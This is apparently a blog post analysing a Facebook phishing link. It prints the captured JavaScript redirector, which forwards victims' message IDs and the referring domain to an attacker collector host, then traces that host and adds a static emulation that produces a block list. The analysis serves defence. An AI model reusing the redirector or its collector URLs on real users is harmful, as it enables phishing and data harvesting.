Phishing on Facebook
I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contained something that this person would probably never say to me, followed by a link. I immediately suspected that this was part of a phishing scam. Knowing that others who had been sent the same message might not realize the danger, I immediately told everyone not to click the link.
Now that the chance of others being taken advantage of by this scam was greatly reduced, I could begin my investigation into what sort of information the phishers were gathering. I fired up a terminal and went to work.
$ curl http://198.64.140.97/funnymovie/
nzmkuewnjpew hvsigccd <script src="3jsum37jmq1z.js"></script> uvqztdlft egjykgmuvrrzzmr
Well, that seemed odd. I didn't understand the random characters, but the script tag made it completely obvious that they were up to no good. Let's see what it does.
$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js
// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/'; // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
// abc1 and abc2 are identical, so this branch always picks the same collector URL
// (abc is never declared with var, so it becomes an implicit global)
if ((location.search).length>0) abc = abc1; else abc = abc2;
// one landing page on the collector per social network the victim came from
var redirects = [
    ['facebook.com',   abc+'fb.php'],
    ['tagged.com',     abc+'tg.php'],
    ['friendster.com', abc+'fr.php'],
    ['myspace.com',    abc+'ms.php'],
    ['msplinks.com',   abc+'ms.php'],
    ['myyearbook.com', abc+'yb.php'],
    ['fubar.com',      abc+'fu.php'],
    ['twitter.com',    abc+'tw.php'],
    ['hi5.com',        abc+'hi5.php'],
    ['bebo.com',       abc+'be.php']
]; // 3
// document.referrer tells the script which site the victim clicked the link on
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
    if ((s.indexOf(redirects[i][0]) != -1)) { // 4
        // forward the original query string and append the landing page's host
        var redir = redirects[i][1] + location.search;
        if ((location.search).length>0)
            redir = redir + '&domain=' + location.host;
        else
            redir = redir + '?domain=' + location.host;
        location.href = redir; // 5
        r = true;
        break;
    }
}
// unknown referrer: send the victim to index.php on the collector instead
if (!r) location.href = abc+'index.php' + location.search;
This find was definitely interesting. Let’s go step by step and figure out what they are doing.
First I wanted to know about the site behind all of this, http://r-d-cgpay-090709.com. Its IP address and approximate location could be determined with a simple traceroute.
$ traceroute r-d-cgpay-090709.com
traceroute to r-d-cgpay-090709.com (61.235.117.71)
 1  192.168.1.1 (192.168.1.1)  9.331 ms  1.834 ms  2.213 ms
 2  * * *
 3  te-3-4-ur04.santaclara.ca.sfba.comcast.net
 4  be-70-ar01.oakland.ca.sfba.comcast.net
 5  pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net
 6  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net
 7  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net
 8  tenge13-3.br02.sjo01.pccwbtn.net
 9  china-tietong.pos6-2.cr02.hkg04.pccwbtn.net
10  61.237.119.81
11  61.237.112.74
12  222.50.127.218
13  61.235.116.130
14  61.235.117.71
It appeared that this IP address was somewhere in China, judging by the hop containing “china-tietong”. I was then curious whether they had a pattern of dubious behavior, so I entered the IP address into Google. According to the search results, McAfee identifies this IP as malicious, as it has been responsible for distributing malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. Below I walk through the lines I numbered in the code.
1. This is the URL they are using to capture the incoming information.
2. In JavaScript, location.search is the query portion of the URL (everything after and including the ?). In the case of Facebook it would look something like ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
3. This part of the code builds a URL of the form http://r-d-cgpay-090709.com/go/fb.php, where the final page differs according to the service the user came from.
4. The for loop searches the redirect array for the originating site. Once it has found the site, it creates a URL of the form http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
5. The browser is sent to this URL so that the attackers can gain information about the user who clicked the link. The site does not send a reply back when this URL is visited.
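To work out where victims are sent without ever loading the attacker's script in a browser, an analyst can emulate its decision logic statically. The following is an added example written for this post, not code from the phishing kit or from the original write-up: the collector URL and the referrer-to-page table are copied from the captured script above, while the sample referrers, query strings and the function names predictRedirect, exfiltratedFields and blockListEntries are my own. The host argument stands in for location.host, which in the captured script is the host of the page that includes it (the 198.64.140.97 landing page), not the referring social network.

```javascript
// Collector endpoint and per-site landing pages, copied from the captured
// script. abc1 and abc2 in the original are identical, so one constant suffices.
const COLLECTOR = 'http://r-d-cgpay-090709.com/go/';
const REDIRECTS = [
  ['facebook.com', 'fb.php'],
  ['tagged.com', 'tg.php'],
  ['friendster.com', 'fr.php'],
  ['myspace.com', 'ms.php'],
  ['msplinks.com', 'ms.php'],
  ['myyearbook.com', 'yb.php'],
  ['fubar.com', 'fu.php'],
  ['twitter.com', 'tw.php'],
  ['hi5.com', 'hi5.php'],
  ['bebo.com', 'be.php'],
];

// Emulates the script's behaviour for one victim visit and returns the URL the
// browser would be sent to. referrer plays the role of document.referrer,
// search of location.search ('' or a string starting with '?'), and host of
// location.host on the landing page. (Hypothetical helper; not the kit's code.)
function predictRedirect(referrer, search, host) {
  const s = String(referrer);
  for (const [site, page] of REDIRECTS) {
    // Same substring match as the original: indexOf on the referrer string.
    if (s.indexOf(site) !== -1) {
      const sep = search.length > 0 ? '&' : '?';
      return COLLECTOR + page + search + sep + 'domain=' + host;
    }
  }
  // Referrer matched no listed network: the script falls through to index.php.
  return COLLECTOR + 'index.php' + search;
}

// Splits the query string of a predicted URL into the fields the collector
// receives, so the exfiltrated data can be listed explicitly.
function exfiltratedFields(url) {
  const q = url.indexOf('?');
  const fields = {};
  if (q === -1) return fields;
  for (const pair of url.slice(q + 1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const val = eq === -1 ? '' : pair.slice(eq + 1);
    fields[decodeURIComponent(key)] = decodeURIComponent(val);
  }
  return fields;
}

// Every distinct collector URL the script can redirect to, sorted, for use as
// a proxy or DNS block list (ms.php is shared by two networks, so it appears once).
function blockListEntries() {
  const urls = new Set(REDIRECTS.map(([, page]) => COLLECTOR + page));
  urls.add(COLLECTOR + 'index.php');
  return [...urls].sort();
}

// Constructed sample visit: a Facebook inbox referrer, a message-style query
// string, and the landing host from the write-up.
const sampleUrl = predictRedirect(
  'http://www.facebook.com/inbox/',
  '?t=1234567890123&mbox_pos=2',
  '198.64.140.97',
);
console.log(sampleUrl);
console.log(exfiltratedFields(sampleUrl));
console.log(blockListEntries());
```

Running the block prints the predicted redirect for the constructed Facebook visit, the three fields the collector receives (t, mbox_pos and domain), and the ten URLs worth blocking. Because the emulation mirrors the script's substring match on the referrer, it also shows the fall-through case: a visit with any referrer outside the table still reaches index.php with the query string intact.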
However, the information they are collecting does not seem very interesting. They were able to obtain the message ID that the URL was posted in along with the originating site. Maybe it is a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcome!